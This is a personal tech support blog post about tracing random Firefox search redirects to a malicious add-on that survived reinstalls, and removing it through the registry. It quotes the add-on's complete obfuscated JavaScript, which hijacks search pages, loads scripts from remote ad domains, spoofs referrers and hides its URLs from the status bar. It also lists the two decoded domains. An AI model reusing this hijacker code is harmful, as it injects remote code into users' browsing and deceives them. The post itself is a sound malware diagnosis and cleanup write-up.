So today I was working on an issue where Firefox would randomly redirect some web searches. All Antivirus scans were clean (MalwareBytes, ComboFix, Trend’s TDSS, etc). GMER shows no rootkits and MBR scanner from GMER also reported the MBR as being clean.
I installed ZoneAlarm to detect any malicious outbound traffic, and it found none – even though searched continued to redirect.
Removing and reinstalling network card drivers proved fruitless.
This is the point where you practice some Office Space moves …and I was thinking about it. (Sorry, Seth…)
Anyway, here’s the fix (You know I wouldn’t have bothered posting this if I didn’t fix it, right?):
Apparently at some point in history past, this guy had gotten a virus which had installed a malicious Firefox Add-on. The tricky thing is that this add-on survives a Firefox uninstall/reinstall.
To see the installed add-ons, I went to Help -> Troubleshooting Information. Here is what I saw:
Check out that bottom entry. Looks safe enough, right? But something didn’t “feel” right about it. I searched the registry for that CLSID and found it under Mozilla Extensions. The path pointed to C:\Users\[username]\AppData\Local\[CLSID shown above]. The folder held a folder called “Chome” and files called “Chome.manifest” and “install.rdf”. The “Chrome” folder held the following file:
<overlay id="safebrowsing-overlay" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<script type="application/x-javascript">
function getRand(min,max) {return Math.floor(Math.random() * (max - min + 1)) + min;}
function getIp() {return getRand(0,255)+'.'+getRand(0,255)+'.'+getRand(0,255)+'.'+getRand(0,255);}
function mdec(s) {var r='',n,l;var l=s.length;if(l%2 !=0) return "";for(var i=0;i&lt;l;i+=2) {n=s.substring(i,i+2);n=parseInt(n,16);r +=String.fromCharCode((i/2)^n);}return r;}
function rm_o(s) { var p,d; if(s.match(/&amp;fadurl=([^&amp;]+)/)) { d=RegExp.$1; p=s.indexOf('/',10);if(!document.cd) document.cd=s.substring(7,p);if(!document.fd) document.fd=d; s=s.substring(p);
if(s.match(/&amp;clcrf=([^&amp;]+)/)) document.rd=RegExp.$1; s=s.replace(/&amp;(fadurl|clcrf)=[^&amp;]+/g,''); return 'http://'+d+s; }
else if(s.indexOf(document.cd) !=-1) { return document.fd; } return -1;}
var _ty="687576733e2a29666c7f6f7978647d667e76277d71623874777435297a787b7b";
var _xn="uu=9/SFA85RSl4jvINASarRj++zrpuRRZveHooHhU8w1uE84stgvmkqYYUIM2SPKVwS5nSRfLU1cuMiKArdj2FsqRnz0HRWIXUfTHFH8egHeP1SeUDX3eaKEN61vp3xlY3fUKzYJcjDPbWebJU5+NoxVnWNaC58pmRZ1EHvlpLSSD0=";
var _sx="687576733e2a2963617a6b69606823667e6266727a613b647d78687874337d704d0e48500b414f54494b464e02475d";
window.addEventListener("load",function() { xulTra.init();},false);var xulTra={ init: function() { var observerService=Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverService);
observerService.addObserver(httpRequestObserver,"http-on-modify-request",false);
var appcontent=document.getElementById("appcontent");
if(appcontent) appcontent.addEventListener("DOMContentLoaded",xulTra.onPageLoad,true);
var td,n,p,dom,dom2;td=new Date();
n='http://'+td.getDate()+'.';
_ty=mdec(_ty);_sx=mdec(_sx);
p=_ty.substring(7).indexOf('/');
dom=_ty.substring(7,p+7);
p=_sx.substring(7).indexOf('/');
dom2=_sx.substring(7,p+7);
_ty=_ty.replace(/http:\/\//,n);
_sx=_sx.replace(/http:\/\//,n);
if(!_ty || !_xn) { return; }
var s;document.getElementById("urlbar").addEventListener("DOMAttrModified",
function(e)
{ if((s=rm_o(e.currentTarget.value)) !=-1) e.currentTarget.value=s;},false);
document.getElementById("statusbar-display").addEventListener("DOMAttrModified",
function(e)
{if(e.target.label.indexOf(dom)!=-1 || e.target.label.indexOf(dom2)!=-1) e.target.label='';
else if((s=rm_o(e.target.label)) !=-1)
e.target.label=s;},false);},
onPageLoad: function(aEvent) { var doc=aEvent.originalTarget;if(doc.defaultView.frameElement) return;
var loc=doc.location.href;
var type='';
if(loc.match(/google.*\/(search|cse).*[&amp;\?]q=/) || loc.match(/search\.yahoo.*search.*[&amp;\?]p=/) || loc.match(/ask.com.*\/web.*[&amp;\?]q=/) ||loc.match(/bing.com\/search.*[&amp;\?]q=/) ||loc.match(/aol\/search.*(query|q)=/)) {type='search';}else if(loc.match(/(yahoo|ask|aol|bing)\.[-\.\w]+\/?$/)) {type='empty';}
else if (loc.match(/(google)\.[-\.\w]+\/?$/) || loc.match(/(google)\.[-\.\w]+\/#/)) {type='live';}
if(type) {if(document.getElementById('_gofeed'))return;
var script,src,ss; if(type=='live') ss = _sx; else ss = _ty;
src = ss+'?type='+type+'&amp;ua=Firefox&amp;ip='+getIp()+'&amp;ref='+encodeURIComponent(loc)+'&amp;'+_xn;
script=doc.createElement('script');script.id='_gofeed';
script.src=src;doc.getElementsByTagName('head')[0].appendChild(script);}}};
var httpRequestObserver={ observe: function(subject,topic,data) { if(topic=="http-on-modify-request") { var httpChannel=subject.QueryInterface(Components.interfaces.nsIHttpChannel); var pos=subject.URI.spec.indexOf("&amp;clcrf=http");if(pos > -1) { var nr=this.ioService=Components.classes["@mozilla.org/network/io-service;1"].getService(Components.interfaces.nsIIOService).newURI(decodeURIComponent(subject.URI.spec.substring(pos+7)),null,null);
httpChannel.referrer=nr;subject.URI.spec=subject.URI.spec.substring(0,pos);}}}};</script></overlay>
I decoded the encrypted variables, and they were the following:
http://advertising5new.com/2feed
http://disable-instant-search.com/js/disable.js
I removed the registry entry and deleted the [CLSID] folder, and that took care of the problem.
Have to admit Mr. Virus Man. Not bad java cript there. Pitty you can’t find something more useful to do with it.
